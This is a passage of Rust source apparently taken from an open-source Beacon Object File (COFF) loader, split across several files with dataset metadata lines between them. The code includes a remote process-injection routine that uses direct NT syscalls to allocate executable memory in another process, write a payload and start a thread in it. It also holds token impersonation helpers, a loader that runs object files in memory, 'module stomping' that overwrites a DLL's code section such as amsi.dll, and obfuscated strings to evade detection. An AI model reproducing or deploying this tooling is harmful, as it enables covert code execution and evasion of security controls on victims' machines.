if format.is_null() {
return;
}
unsafe {
if !(*format).original.is_null() {
let layout_result = Layout::from_size_align((*format).size as usize, Layout::new::<i8>().align());
if let Ok(layout) = layout_result {
alloc::alloc::dealloc((*format).original as *mut u8, layout);
(*format).original = null_mut();
}
}
(*format).buffer = null_mut();
(*format).length = 0;
(*format).size = 0;
}
}
/// Formats a string using printf-style formatting and appends the result
/// to a `Format` buffer.
///
/// Follows the behavior of Beacon’s `beacon_formt_printf`.
#[unsafe(no_mangle)]
unsafe extern "C" fn beacon_formt_printf(format: *mut Format, fmt: *const c_char, mut args: ...) {
if format.is_null() || fmt.is_null() {
return;
}
let fmt_str = CStr::from_ptr(fmt).to_str().unwrap_or("");
let mut temp_str = String::new();
printf_compat::format(fmt_str.as_ptr().cast(), args.as_va_list(), printf_compat::output::fmt_write(&mut temp_str));
let length_needed = temp_str.len() as c_int;
if (*format).length + length_needed >= (*format).size {
return;
}
ptr::copy_nonoverlapping(
temp_str.as_ptr() as *const c_char,
(*format).buffer.add((*format).length as usize),
length_needed as usize,
);
(*format).length += length_needed;
}
/// Extracts a 2-byte value from a Beacon `Data` buffer.
fn beacon_data_short(data: *mut Data) -> c_short {
if data.is_null() {
return 0;
}
let parser = unsafe { &mut *data };
if parser.length < 2 {
return 0;
}
let result = unsafe { ptr::read_unaligned(parser.buffer as *const i16) };
parser.buffer = unsafe { parser.buffer.add(2) };
parser.length -= 2;
result as c_short
}
/// Extracts a 4-byte value from a Beacon `Data` buffer.
fn beacon_data_int(data: *mut Data) -> c_int {
if data.is_null() {
return 0;
}
let parser = unsafe { &mut *data };
if parser.length < 4 {
return 0;
}
let result = unsafe { ptr::read_unaligned(parser.buffer as *const i32) };
parser.buffer = unsafe { parser.buffer.add(4) };
parser.length -= 4;
result as c_int
}
/// Extracts an arbitrary-length blob from a `Data` buffer.
fn beacon_data_extract(data: *mut Data, size: *mut c_int) -> *mut c_char {
if data.is_null() {
return null_mut();
}
let parser = unsafe { &mut *data };
if parser.length < 4 {
return null_mut();
}
let length = unsafe { ptr::read_unaligned(parser.buffer as *const u32) };
let outdata = unsafe { parser.buffer.add(4) };
if outdata.is_null() {
return null_mut();
}
parser.buffer = unsafe { parser.buffer.add(4 + length as usize) };
parser.length -= 4 + length as c_int;
if !size.is_null() && !outdata.is_null() {
unsafe {
*size = length as c_int;
}
}
outdata as *mut c_char
}
/// Initializes a `Data` parser over a raw buffer.
fn beacon_data_parse(data: *mut Data, buffer: *mut c_char, size: c_int) {
if data.is_null() {
return;
}
unsafe {
(*data).original = buffer;
(*data).buffer = buffer.add(4);
(*data).length = size - 4;
(*data).size = size - 4;
}
}
/// Returns the remaining data length in a `Data` parser.
fn beacon_data_length(data: *const Data) -> c_int {
if data.is_null() {
return 0;
}
unsafe { (*data).length }
}
/// Returns the collected Beacon output and size as raw bytes.
fn beacon_get_output_data(outsize: *mut c_int) -> *mut c_char {
unsafe {
let mut beacon = BEACON_BUFFER.lock();
let (ptr, size) = beacon.get_output();
if !outsize.is_null() {
*outsize = size as c_int;
}
ptr
}
}
/// Appends raw output data into the Beacon output buffer.
fn beacon_output(_type: c_int, data: *mut c_char, len: c_int) {
let mut buffer = BEACON_BUFFER.lock();
buffer.append_char(data, len);
}
/// Formats a string using Beacon’s printf mechanism and stores it.
#[unsafe(no_mangle)]
unsafe extern "C" fn beacon_printf(_type: c_int, fmt: *mut c_char, mut args: ...) {
let mut str = String::new();
printf_compat::format(fmt, args.as_va_list(), printf_compat::output::fmt_write(&mut str));
str.push('\0');
let mut buffer = BEACON_BUFFER.lock();
buffer.append_string(&str);
}
/// Reverts any impersonated token back to the original process token.
fn beacon_rever_token() {
unsafe {
if RevertToSelf() == 0 {
log::warn!("RevertToSelf Failed!")
}
}
}
/// Applies a token to the current thread.
fn beacon_use_token(token: HANDLE) -> i32 {
unsafe { SetThreadToken(null_mut(), token) }
}
/// Closes handles associated with a spawned process.
fn beacon_cleanup_process(info: *const PROCESS_INFORMATION) {
unsafe {
CloseHandle((*info).hProcess);
CloseHandle((*info).hThread);
}
}
/// Checks whether the current process is elevated (admin token).
fn beacon_is_admin() -> u32 {
let mut h_token = null_mut();
unsafe {
if OpenProcessToken(NtCurrentProcess(), TOKEN_QUERY, &mut h_token) != 0 {
let mut elevation = TOKEN_ELEVATION { TokenIsElevated: 0 };
let mut return_length = 0;
if GetTokenInformation(
h_token,
TokenElevation,
&mut elevation as *mut _ as *mut c_void,
size_of::<TOKEN_ELEVATION>() as u32,
&mut return_length,
) != 0
{
return (elevation.TokenIsElevated == 1) as u32;
}
}
}
0
}
/// Converts endianness of a 32-bit integer.
fn swap_endianness(src: u32) -> u32 {
// Check if the system is little-endian
if cfg!(target_endian = "little") {
// Small-endian to large-endian converter
src.swap_bytes()
} else {
// If it is already big-endian, it returns the original value
src
}
}
/// Converts a C-string to UTF-16 and writes it into the destination buffer.
fn to_wide_char(src: *const c_char, dst: *mut u16, max: c_int) -> c_int {
if src.is_null() || dst.is_null() || max < size_of::<u16>() as c_int {
return 0;
}
unsafe {
// Converting the `src` pointer to a C string
let c_str = CStr::from_ptr(src);
// Converts CStr to a Rust string
if let Ok(str_slice) = c_str.to_str() {
// Encoding a Rust string as UTF-16
let utf16_chars = str_slice.encode_utf16().collect::<Vec<u16>>();
let dst_slice = core::slice::from_raw_parts_mut(dst, (max as usize) / size_of::<u16>());
let num_chars = utf16_chars.len();
if num_chars >= dst_slice.len() {
return 0; // Not enough space
}
// Copy the UTF-16 characters to the destination buffer
dst_slice[..num_chars].copy_from_slice(&utf16_chars);
// Adds the null-terminator
dst_slice[num_chars] = 0;
}
}
1
}
/// Performs remote process injection into a target process via NT syscalls.
fn beacon_inject_process(
_h_process: HANDLE,
pid: c_int,
payload: *const c_char,
len: c_int,
_offset: c_char,
_arg: *const c_char,
_a_len: c_int
) {
if payload.is_null() || len <= 0 {
return;
}
unsafe {
let mut oa = OBJECT_ATTRIBUTES::default();
let mut ci = CLIENT_ID {
UniqueProcess: pid as HANDLE,
UniqueThread: null_mut(),
};
let mut h_process = null_mut::<c_void>();
let status = syscall!(s!("NtOpenProcess"), &mut h_process, PROCESS_ALL_ACCESS, &mut oa, &mut ci);
if status != Some(STATUS_SUCCESS) {
return;
}
let mut size = len as usize;
let mut address = null_mut::<c_void>();
let mut status = syscall!(
s!("NtAllocateVirtualMemory"),
h_process,
&mut address,
0,
&mut size,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
);
if status != Some(STATUS_SUCCESS) {
CloseHandle(h_process);
return;
}
let mut now = 0usize;
status = syscall!(s!("NtWriteVirtualMemory"), h_process, address, payload as *const c_void, len as usize, &mut now);
if status != Some(STATUS_SUCCESS) {
CloseHandle(h_process);
return;
}
let mut h_thread = null_mut::<c_void>();
status = syscall!(
s!("NtCreateThreadEx"),
&mut h_thread,
THREAD_ALL_ACCESS,
null_mut::<c_void>(),
h_process,
address,
null_mut::<c_void>(),
0usize,
0usize,
0usize,
0usize,
null_mut::<c_void>()
);
if status != Some(STATUS_SUCCESS) || h_thread.is_null() {
CloseHandle(h_process);
return;
}
CloseHandle(h_thread);
CloseHandle(h_process);
}
}
/// Extracts a pointer to a region of the `Data` buffer.
fn beacon_data_ptr(data: *mut Data, size: c_int) -> *mut c_char {
if data.is_null() || size <= 0 {
return null_mut();
}
let parser = unsafe { &mut *data };
if parser.length < size {
return null_mut();
}
let result = parser.buffer;
parser.buffer = unsafe { parser.buffer.add(size as usize) };
parser.length -= size;
result
}
/// Leaving this to be implemented by people needing/wanting it
fn beacon_inject_temporary_process(
_info: *const PROCESS_INFORMATION,
_payload: *const c_char,
_len: c_int,
_offset: c_int,
_arg: *const c_char,
_a_len: c_int,
) {
unimplemented!()
}
/// Leaving this to be implemented by people needing/wanting it
fn beacon_spawn_temporary_process(
_x86: i32,
_ignore_token: i32,
_s_info: *mut STARTUPINFOA,
_p_info: *mut PROCESS_INFORMATION
) {
unimplemented!()
}
/// Leaving this to be implemented by people needing/wanting it
fn beacon_get_spawn_to(_x86: i32, _buffer: *const c_char, _length: c_int) {
unimplemented!()
}
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/lib.rs | src/lib.rs | #![no_std]
#![doc = include_str!("../README.md")]
#![feature(c_variadic, core_intrinsics)]
#![allow(clippy::ptr_eq)]
#![allow(non_snake_case, non_camel_case_types)]
#![allow(internal_features, unsafe_op_in_unsafe_fn)]
extern crate alloc;
mod beacon;
mod loader;
mod beacon_pack;
pub mod coff;
pub mod error;
pub use loader::CoffeeLdr;
pub use beacon_pack::BeaconPack;
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/error.rs | src/error.rs | //! Errors returned by this crate.
//!
//! This module contains the definitions for all error types returned by this crate.
use alloc::string::String;
use thiserror::Error;
/// Result alias for CoffeeLdr operations.
pub type Result<T> = core::result::Result<T, CoffeeLdrError>;
/// Represents all possible errors that can occur in the COFF loader.
#[derive(Debug, Error)]
pub enum CoffeeLdrError {
/// Generic error with descriptive message.
#[error("{0}")]
Msg(String),
/// Error returned by the `binrw` parser while reading or deserializing COFF data.
#[error("binrw error: {0}")]
Binrw(binrw::Error),
/// Hexadecimal encoding or decoding failure.
#[error("hex error: {0}")]
Hex(hex::FromHexError),
/// I/O read or write failure.
#[error("io error: {0}")]
Io(binrw::io::Error),
/// Nested COFF parsing or validation error.
#[error("coff error: {0}")]
CoffError(#[from] CoffError),
/// Memory allocation failure.
#[error("memory allocation error: code {0}")]
MemoryAllocationError(u32),
/// Memory protection or permission failure.
#[error("memory protection error: code {0}")]
MemoryProtectionError(u32),
/// Invalid or malformed symbol format.
#[error("invalid symbol format: '{0}'")]
InvalidSymbolFormat(String),
/// Unsupported relocation type.
#[error("invalid relocation type: {0}")]
InvalidRelocationType(u16),
/// Symbol not found during resolution.
#[error("symbol not found: '{0}'")]
FunctionNotFound(String),
/// Internal symbol could not be resolved.
#[error("internal symbol not found: '{0}'")]
FunctionInternalNotFound(String),
/// Target module could not be resolved.
#[error("module not found: '{0}'")]
ModuleNotFound(String),
/// Failed to parse or load COFF file.
#[error("error loading COFF file")]
ParsingError,
/// Architecture mismatch between file and host.
#[error("arch mismatch: expected {expected}, actual {actual}")]
ArchitectureMismatch { expected: &'static str, actual: &'static str },
/// File contains more symbols than supported.
#[error("too many symbols (max {0})")]
TooManySymbols(usize),
/// Failed to parse symbol entry.
#[error("symbol parse error: '{0}'")]
ParseError(String),
/// Symbol ignored due to missing required prefix.
#[error("symbol ignored (missing required prefix)")]
SymbolIgnored,
/// Error reading or flushing output buffer.
#[error("output read error")]
OutputError,
/// `.text` section could not be located.
#[error("missing .text section in target module")]
StompingTextSectionNotFound,
/// COFF too large to overwrite target module.
#[error("stomping size overflow")]
StompingSizeOverflow,
/// Missing base address during module stomping.
#[error("missing base address for target section")]
MissingStompingBaseAddress,
}
/// Represents specific errors during COFF parsing or validation.
#[derive(Debug, Error)]
pub enum CoffError {
/// File could not be opened or read.
#[error("file read error: {0}")]
FileReadError(String),
/// COFF header is invalid or missing.
#[error("invalid COFF header")]
InvalidCoffFile,
/// COFF symbol table could not be read.
#[error("invalid COFF symbols")]
InvalidCoffSymbolsFile,
/// COFF section headers are invalid or missing.
#[error("invalid COFF section headers")]
InvalidCoffSectionFile,
/// Architecture not supported (expected x64 or x86).
#[error("unsupported architecture")]
UnsupportedArchitecture,
/// Invalid section or symbol count.
#[error("invalid number of sections or symbols")]
InvalidSectionsOrSymbols,
/// Section count exceeds supported limit.
#[error("section limit exceeded (max 96)")]
SectionLimitExceeded,
}
impl From<hex::FromHexError> for CoffeeLdrError {
fn from(err: hex::FromHexError) -> Self {
CoffeeLdrError::Hex(err)
}
}
impl From<binrw::io::Error> for CoffeeLdrError {
fn from(err: binrw::io::Error) -> Self {
CoffeeLdrError::Binrw(binrw::Error::Io(err))
}
} | rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/src/loader.rs | src/loader.rs | use alloc::{
boxed::Box,
collections::BTreeMap,
ffi::CString,
format,
string::{String, ToString},
vec::Vec,
vec,
};
use core::intrinsics::{
volatile_copy_nonoverlapping_memory,
volatile_set_memory
};
use core::{
ffi::c_void,
mem::transmute,
ptr::{
null_mut,
read_unaligned,
write_unaligned
},
};
use log::{debug, info, warn};
use obfstr::{obfstr as obf, obfstring as s};
use dinvk::{dinvoke, helper::PE, types::NTSTATUS};
use dinvk::module::{
get_proc_address,
get_module_address,
get_ntdll_address
};
use dinvk::winapis::{
NT_SUCCESS, NtProtectVirtualMemory,
NtAllocateVirtualMemory, NtCurrentProcess,
LoadLibraryA,
};
use windows_sys::Win32::{
Foundation::*,
Storage::FileSystem::*,
System::{
Memory::*,
SystemServices::*,
Diagnostics::Debug::*,
LibraryLoader::DONT_RESOLVE_DLL_REFERENCES,
},
};
use crate::error::{CoffError, CoffeeLdrError, Result};
use crate::coff::{Coff, CoffMachine, CoffSource};
use crate::coff::{IMAGE_RELOCATION, IMAGE_SYMBOL};
use crate::beacon::{get_function_internal_address, get_output_data};
/// Type alias for the COFF main input function.
type CoffMain = extern "C" fn(*mut u8, usize);
/// Represents a Rust interface to the COFF (Common Object File Format) files.
///
/// # Examples
///
/// Using a file as a source:
///
/// ```
/// use coffeeldr::CoffeeLdr;
///
/// let mut loader = CoffeeLdr::new("whoami.o");
/// match loader {
/// Ok(ldr) => {
/// println!("COFF successfully uploaded!");
/// // Use `ldr` to execute or process the COFF file
/// },
/// Err(e) => eprintln!("Error loading COFF: {:?}", e),
/// }
/// ```
///
/// Using a byte buffer as a source:
///
/// ```
/// use coffeeldr::CoffeeLdr;
///
/// let coff_data = include_bytes!("path/to/coff_file.o");
/// let mut loader = CoffeeLdr::new(&coff_data);
/// match loader {
/// Ok(ldr) => {
/// println!("COFF successfully loaded from buffer!");
/// // Use `ldr` to execute or process the COFF file
/// },
/// Err(e) => eprintln!("Error loading COFF: {:?}", e),
/// }
/// ```
#[derive(Default)]
pub struct CoffeeLdr<'a> {
/// Parsed COFF object backing this loader.
coff: Coff<'a>,
/// Mapping for each allocated section.
section_map: Vec<SectionMap>,
/// Table of resolved external functions.
symbols: CoffSymbol,
/// Name of the module that will be stomped when stomping is enabled.
module: &'a str,
}
impl<'a> CoffeeLdr<'a> {
/// Creates a new COFF loader from a file path or raw buffer.
///
/// The source is parsed immediately. If the file cannot be
/// read or the COFF format is invalid, an error is returned.
///
/// # Errors
///
/// Fails when the file cannot be read or the COFF data is malformed.
///
/// # Examples
///
/// ```
/// let loader = CoffeeLdr::new("payload.o")?;
/// ```
pub fn new<T: Into<CoffSource<'a>>>(source: T) -> Result<Self> {
// Processes COFF based on the source (file or buffer)
let coff = match source.into() {
CoffSource::File(path) => {
info!("Try to read the file: {path}");
// Try reading the file
let buffer = read_file(path)
.map_err(|_| CoffError::FileReadError(path.to_string()))?;
// Creates the COFF object from the buffer
Coff::parse(Box::leak(buffer.into_boxed_slice()))?
}
// Creates the COFF directly from the buffer
CoffSource::Buffer(buffer) => Coff::parse(buffer)?,
};
Ok(Self {
coff,
section_map: Vec::new(),
symbols: CoffSymbol::default(),
..Default::default()
})
}
/// Enables module stomping using the specified module's `.text` region.
///
/// When enabled, the loader overwrites the module's `.text` section instead
/// of allocating fresh memory.
///
/// # Examples
///
/// ```
/// let loader = CoffeeLdr::new("bof.o")?
/// .with_module_stomping("amsi.dll");
/// ```
#[must_use]
pub fn with_module_stomping(mut self, module: &'a str) -> Self {
self.module = module;
self
}
/// Executes the COFF payload by invoking the chosen entry point.
///
/// The loader prepares memory, applies relocations, resolves imports,
/// and then jumps to the specified entry symbol.
/// Any Beacon output captured during execution is returned as a string.
///
/// # Errors
///
/// Fails if preparation fails (bad architecture, memory failure,
/// relocation errors, unresolved imports) or if output transport fails.
///
/// # Examples
///
/// ```
/// let mut loader = CoffeeLdr::new("whoami.o")?;
/// let output = loader.run("go", None, None)?;
/// println!("{output}");
/// ```
pub fn run(
&mut self,
entry: &str,
args: Option<*mut u8>,
argc: Option<usize>,
) -> Result<String> {
info!("Preparing environment for COFF execution.");
// Prepares the environment to execute the COFF file
self.prepare()?;
for symbol in &self.coff.symbols {
let name = self.coff.get_symbol_name(symbol);
if name == entry && Coff::is_fcn(symbol.Type) {
info!("Running COFF file: entry point = {}, args = {:?}, argc = {:?}", name, args, argc);
let section_addr = self.section_map[(symbol.SectionNumber - 1) as usize].base;
let entrypoint = unsafe { section_addr.offset(symbol.Value as isize) };
let coff_main: CoffMain = unsafe { transmute(entrypoint) };
coff_main(args.unwrap_or(null_mut()), argc.unwrap_or(0));
break;
}
}
// Returns the output if available, otherwise, returns an empty response
Ok(get_output_data()
.filter(|o| !o.buffer.is_empty())
.map(|o| o.to_string())
.unwrap_or_default())
}
/// Prepares the COFF for execution.
///
/// This includes architecture verification, memory allocation,
/// symbol resolution, relocation processing and applying final protections.
///
/// # Errors
///
/// Fails if memory allocation fails, relocation cannot be applied,
/// or required symbols cannot be resolved.
fn prepare(&mut self) -> Result<()> {
// Verify that the COFF file's architecture
self.coff.arch.check_architecture()?;
// Allocate memory for loading COFF sections and store the allocated section mappings
let mem = CoffMemory::new(&self.coff, self.module);
let (sections, sec_base) = mem.alloc()?;
self.section_map = sections;
// Resolve external symbols and build a function lookup map
let (functions, symbols) = CoffSymbol::new(&self.coff, self.module, sec_base)?;
self.symbols = symbols;
// Process relocations to correctly adjust symbol addresses based on memory layout
let reloc = CoffRelocation::new(&self.coff, &self.section_map);
reloc.apply_relocations(&functions, &self.symbols)?;
// Adjust memory permissions for allocated sections
self.section_map
.iter_mut()
.filter(|section| section.size > 0)
.try_for_each(|section| section.adjust_permissions())?;
Ok(())
}
}
impl Drop for CoffeeLdr<'_> {
fn drop(&mut self) {
// When stomping, memory belongs to another module and must not be freed
if !self.module.is_empty() {
return;
}
let mut size = 0;
for section in self.section_map.iter_mut() {
if !section.base.is_null() {
NtFreeVirtualMemory(
NtCurrentProcess(),
&mut section.base,
&mut size,
MEM_RELEASE
);
}
}
if !self.symbols.address.is_null() {
NtFreeVirtualMemory(
NtCurrentProcess(),
unsafe { &mut *self.symbols.address },
&mut size,
MEM_RELEASE
);
}
}
}
/// Manages allocation and optional module stomping for COFF sections.
struct CoffMemory<'a> {
/// Parsed COFF file to be loaded.
coff: &'a Coff<'a>,
/// Name of the target module to stomp.
module: &'a str,
}
impl<'a> CoffMemory<'a> {
/// Creates a memory allocator for this COFF instance.
pub fn new(coff: &'a Coff<'a>, module: &'a str) -> Self {
Self {
coff,
module,
}
}
/// Allocates memory either by stomping a module or reserving a new region.
///
/// # Errors
///
/// Fails if memory cannot be allocated or stomping cannot be applied.
pub fn alloc(&self) -> Result<(Vec<SectionMap>, Option<*mut c_void>)> {
if !self.module.is_empty() {
self.alloc_with_stomping()
} else {
self.alloc_bof_memory()
}
}
/// Allocates fresh executable memory for the COFF payload.
///
/// # Errors
///
/// Fails if the OS cannot allocate the region.
fn alloc_bof_memory(&self) -> Result<(Vec<SectionMap>, Option<*mut c_void>)> {
let mut size = self.coff.size();
let mut addr = null_mut();
let status = NtAllocateVirtualMemory(
NtCurrentProcess(),
&mut addr,
0,
&mut size,
MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN,
PAGE_READWRITE
);
if status != STATUS_SUCCESS {
return Err(CoffeeLdrError::MemoryAllocationError(unsafe { GetLastError() }));
}
debug!("Memory successfully allocated for BOF at address: {:?}", addr);
let (sections, _) = SectionMap::copy_sections(addr, self.coff);
Ok((sections, None))
}
/// Performs module stomping by overwriting a module’s `.text` section.
///
/// # Errors
///
/// Fails if the section cannot be located, resized or overwritten.
fn alloc_with_stomping(&self) -> Result<(Vec<SectionMap>, Option<*mut c_void>)> {
let (mut text_address, mut size) = self.get_text_module()
.ok_or(CoffeeLdrError::StompingTextSectionNotFound)?;
// If the file is larger than the space inside the .text of the target module,
// we do not stomp
if self.coff.size() > size {
return Err(CoffeeLdrError::StompingSizeOverflow);
}
let mut old = 0;
if !NT_SUCCESS(NtProtectVirtualMemory(
NtCurrentProcess(),
&mut text_address,
&mut size,
PAGE_READWRITE,
&mut old
)) {
return Err(CoffeeLdrError::MemoryProtectionError(unsafe { GetLastError() }));
}
// This is necessary because REL32 instructions must remain within range, and allocating the `Symbol`
// elsewhere (e.g. with a distant `NtAllocateVirtualMemory`) could lead to crashes
debug!(
"Memory successfully allocated for BOF at address (Module Stomping): {:?}",
text_address
);
let (sections, sec_base) = SectionMap::copy_sections(text_address, self.coff);
Ok((sections, Some(sec_base)))
}
/// Finds the `.text` section of the target module, if present.
fn get_text_module(&self) -> Option<(*mut c_void, usize)> {
// Invoking LoadLibraryExA dynamically
let target = format!("{}\0", self.module);
let h_module = {
let handle = get_module_address(self.module, None);
if handle.is_null() {
LoadLibraryExA(
target.as_ptr(),
null_mut(),
DONT_RESOLVE_DLL_REFERENCES
)?
} else {
handle
}
};
if h_module.is_null() {
return None;
}
// Retrieving `.text` from the target module
let pe = PE::parse(h_module);
let section = pe.section_by_name(obf!(".text"))?;
let ptr = (h_module as usize + section.VirtualAddress as usize) as *mut c_void;
let size = section.SizeOfRawData as usize;
Some((ptr, size))
}
}
/// Maximum number of symbols that the function map can handle.
const MAX_SYMBOLS: usize = 600;
/// Represents a mapping of external symbols (functions) to their memory addresses.
#[derive(Debug, Clone, Copy)]
struct CoffSymbol {
/// A pointer to an array of pointers, each pointing to an external function.
address: *mut *mut c_void,
}
impl CoffSymbol {
/// Resolves all external symbols used by the COFF image.
///
/// # Errors
///
/// Fails if the table cannot be allocated or any symbol cannot be resolved.
pub fn new(
coff: &Coff,
module: &str,
base_addr: Option<*mut c_void>,
) -> Result<(BTreeMap<String, usize>, Self)> {
// Resolves the symbols of the coff file
let symbols = Self::process_symbols(coff)?;
// When stomping, we must reuse the memory at `base_addr`
let address = if !module.is_empty() {
let addr = base_addr.ok_or(CoffeeLdrError::MissingStompingBaseAddress)?;
addr as *mut *mut c_void
} else {
let mut size = MAX_SYMBOLS * size_of::<*mut c_void>();
let mut addr = null_mut();
let status = NtAllocateVirtualMemory(
NtCurrentProcess(),
&mut addr,
0,
&mut size,
MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN,
PAGE_READWRITE,
);
if addr.is_null() || status != STATUS_SUCCESS {
return Err(CoffeeLdrError::MemoryAllocationError(unsafe { GetLastError() }));
}
addr as *mut *mut c_void
};
Ok((symbols, Self { address }))
}
/// Scans the COFF symbol table for imports and resolves them.
///
/// # Errors
///
/// Fails if symbol count exceeds limit or any import cannot be resolved.
fn process_symbols(coff: &Coff) -> Result<BTreeMap<String, usize>> {
let mut functions = BTreeMap::new();
for symbol in &coff.symbols {
if functions.len() >= MAX_SYMBOLS {
return Err(CoffeeLdrError::TooManySymbols(functions.len()));
}
if symbol.StorageClass == IMAGE_SYM_CLASS_EXTERNAL as u8 && symbol.SectionNumber == 0 {
let name = coff.get_symbol_name(symbol);
let address = Self::resolve_symbol_address(&name, coff)?;
functions.insert(name, address);
}
}
Ok(functions)
}
/// Resolves a symbol name to an address: Beacon helpers or DLL exports.
///
/// # Errors
///
/// Fails when the symbol cannot be parsed, module cannot be loaded,
/// or the export cannot be found.
fn resolve_symbol_address(name: &str, coff: &Coff) -> Result<usize> {
debug!("Attempting to resolve address for symbol: {}", name);
let prefix = match coff.arch {
CoffMachine::X64 => "__imp_",
CoffMachine::X32 => "__imp__",
};
let symbol_name = name
.strip_prefix(prefix)
.map_or_else(|| Err(CoffeeLdrError::SymbolIgnored), Ok)?;
if symbol_name.starts_with(obf!("Beacon")) || symbol_name.starts_with(obf!("toWideChar")) {
debug!("Resolving Beacon: {}", symbol_name);
return get_function_internal_address(symbol_name);
}
let (dll, mut function) = symbol_name
.split_once('$')
.ok_or_else(|| CoffeeLdrError::ParseError(symbol_name.to_string()))?;
if let CoffMachine::X32 = coff.arch {
function = function.split('@').next().unwrap_or(function);
}
debug!("Resolving Module {} and Function {}", dll, function);
let module = {
let mut handle = get_module_address(dll.to_string(), None);
if handle.is_null() {
handle = LoadLibraryA(dll);
if handle.is_null() {
return Err(CoffeeLdrError::ModuleNotFound(dll.to_string()));
}
handle
} else {
handle
}
};
let addr = get_proc_address(module, function, None);
if addr.is_null() {
Err(CoffeeLdrError::FunctionNotFound(symbol_name.to_string()))
} else {
Ok(addr as usize)
}
}
}
impl Default for CoffSymbol {
fn default() -> Self {
Self { address: null_mut() }
}
}
/// Describes a mapped section of memory, including base, size and attributes.
#[derive(Debug, Clone)]
struct SectionMap {
/// Base address of the section.
base: *mut c_void,
/// Section size in bytes.
size: usize,
/// Section characteristics.
characteristics: u32,
/// Section name.
name: String,
}
impl SectionMap {
/// Copies all COFF sections into the destination memory region.
///
/// Returns the list of mapped sections and the next aligned pointer.
fn copy_sections(virt_addr: *mut c_void, coff: &Coff) -> (Vec<SectionMap>, *mut c_void) {
unsafe {
let sections = &coff.sections;
let mut base = virt_addr;
let sections = sections
.iter()
.map(|section| {
let size = section.SizeOfRawData as usize;
let name = Coff::get_section_name(section);
let address = coff.buffer.as_ptr().add(section.PointerToRawData as usize);
if section.PointerToRawData != 0 {
debug!("Copying section: {}", name);
volatile_copy_nonoverlapping_memory(base as *mut u8, address.cast_mut(), size);
} else {
volatile_set_memory(address.cast_mut(), 0, size);
}
let section_map = SectionMap {
base,
size,
characteristics: section.Characteristics,
name,
};
base = Coff::page_align((base as usize) + size) as *mut c_void;
section_map
})
.collect();
(sections, base)
}
}
/// Applies the correct memory protections to this section.
///
/// # Errors
///
/// Fails if `NtProtectVirtualMemory` fails.
fn adjust_permissions(&mut self) -> Result<()> {
info!(
"Adjusting memory permissions for section: Name = {}, Address = {:?}, Size = {}, Characteristics = 0x{:X}",
self.name, self.base, self.size, self.characteristics
);
let bitmask = self.characteristics & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE);
let mut protection = if bitmask == 0 {
PAGE_NOACCESS
} else if bitmask == IMAGE_SCN_MEM_EXECUTE {
PAGE_EXECUTE
} else if bitmask == IMAGE_SCN_MEM_READ {
PAGE_READONLY
} else if bitmask == (IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE) {
PAGE_EXECUTE_READ
} else if bitmask == IMAGE_SCN_MEM_WRITE {
PAGE_WRITECOPY
} else if bitmask == (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE) {
PAGE_EXECUTE_WRITECOPY
} else if bitmask == (IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE) {
PAGE_READWRITE
} else if bitmask == (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE) {
PAGE_EXECUTE_READWRITE
} else {
warn!("Unknown protection, using PAGE_EXECUTE_READWRITE");
PAGE_EXECUTE_READWRITE
};
if (protection & IMAGE_SCN_MEM_NOT_CACHED) == IMAGE_SCN_MEM_NOT_CACHED {
protection |= PAGE_NOCACHE;
}
let mut old = 0;
if !NT_SUCCESS(NtProtectVirtualMemory(
NtCurrentProcess(),
&mut self.base,
&mut self.size,
protection,
&mut old
)) {
return Err(CoffeeLdrError::MemoryProtectionError(unsafe { GetLastError() }));
}
Ok(())
}
}
/// Handles relocation of symbols for COFF sections.
struct CoffRelocation<'a> {
/// Parsed COFF object containing sections and symbols.
coff: &'a Coff<'a>,
/// Mapped sections in memory, used to compute relocation targets.
section_map: &'a [SectionMap],
}
impl<'a> CoffRelocation<'a> {
/// Creates a relocation helper bound to a specific COFF image and its mapped sections.
pub fn new(coff: &'a Coff, section_map: &'a [SectionMap]) -> Self {
Self { coff, section_map }
}
/// Applies all relocations for the current COFF image.
///
/// The function iterates over each section, looks up the symbols referenced
/// by its relocation entries, and adjusts the in-memory image accordingly.
/// Resolved external functions are written into the symbol table and used
/// when computing relative or absolute addresses.
///
/// # Errors
///
/// Fails if any relocation type is invalid or unsupported for the current
/// machine architecture.
pub fn apply_relocations(
&self,
functions: &BTreeMap<String, usize>,
symbols: &CoffSymbol
) -> Result<()> {
let mut index = 0;
for (i, section) in self.coff.sections.iter().enumerate() {
// Retrieve relocation entries for the current section
let relocations = self.coff.get_relocations(section);
for relocation in relocations.iter() {
// Look up the symbol associated with the relocation
let symbol = &self.coff.symbols[relocation.SymbolTableIndex as usize];
// Compute the address where the relocation should be applied
let symbol_reloc_addr = (self.section_map[i].base as usize
+ unsafe { relocation.Anonymous.VirtualAddress } as usize) as *mut c_void;
// Retrieve the symbol's name
let name = self.coff.get_symbol_name(symbol);
if let Some(function_address) = functions.get(&name).map(|&addr| addr as *mut c_void) {
unsafe {
symbols
.address
.add(index)
.write_volatile(function_address);
// Apply the relocation using the resolved function address
self.process_relocations(
symbol_reloc_addr,
function_address,
symbols.address.add(index),
relocation,
symbol
)?;
};
index += 1;
} else {
// Apply the relocation but without a resolved function address (null pointer)
self.process_relocations(
symbol_reloc_addr,
null_mut(),
null_mut(),
relocation,
symbol
)?;
}
}
}
Ok(())
}
/// Applies a single relocation entry.
///
/// The relocation is interpreted according to the COFF machine type and
